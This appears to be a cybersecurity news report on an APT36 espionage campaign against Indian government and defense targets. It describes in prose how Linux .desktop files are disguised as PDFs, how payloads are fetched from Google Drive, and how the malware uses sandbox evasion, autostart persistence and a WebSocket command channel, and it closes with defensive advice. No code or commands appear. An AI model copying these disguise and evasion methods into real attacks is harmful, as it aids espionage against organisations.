APT36 Launches New Cyber-Espionage Campaign on Indian Govt

APT36, also known as Transparent Tribe, has launched a new espionage campaign targeting government and defense institutions in India. This Pakistan-linked group, active since at least 2013, has long relied on phishing campaigns and credential theft to infiltrate restricted systems. In their latest operation, the attackers introduced a novel infection technique, leveraging “.desktop” files in Linux disguised as documents to retrieve malicious payloads from Google Drive and establish a covert command-and-control channel.

According to CloudSEK, the campaign begins with the distribution of ZIP archives containing counterfeit files bearing PDF icons that are, in reality, executable Linux shortcuts. Once executed, the file downloads encrypted payloads from a remote service, decrypts them, and stores them in a temporary directory. Permissions are then altered, and the component is launched in the background. To reduce suspicion and conceal its activity, a decoy PDF is simultaneously opened in Firefox, giving the illusion of legitimacy while the hidden malware is quietly installed.

The downloaded payload is a statically compiled Go-based binary module that first inspects the environment for debugging tools or sandbox execution to avoid detection. If none are found, the malware establishes persistence within the system by enabling autostart on user login. It then initiates a WebSocket connection to a command-and-control server, maintaining a continuous channel for instructions and data exfiltration. This technique allows the attackers to stealthily monitor compromised systems and siphon sensitive information over extended periods.

To mask its presence, several deceptive techniques are employed, such as embedding icons to mimic standard documents and disguising the executable with a PDF title. The malware operates silently: no terminal windows are opened, and no system notifications are displayed, making it particularly dangerous in Linux environments, where organizations often assume a higher baseline of security.

Researchers highlight that the use of Google Drive for payload delivery demonstrates the group’s evolving tradecraft and complicates detection. Phishing emails are crafted with references to procurement and military supplies, designed to appeal to employees in government and defense sectors, significantly increasing the likelihood of successful infection. Once compromised, attackers gain long-term control of systems, enabling continuous surveillance and data interception.

Experts recommend blocking access to the identified command-and-control domains, reviewing activity logs for unusual connections, and implementing advanced attachment scanning in email systems. Strengthening endpoint defenses, deploying comprehensive network traffic monitoring, and conducting regular workstation audits are also advised. Given that the campaign targets critical infrastructures, the threat is assessed as severe, significantly heightening the risk of sensitive data leaks.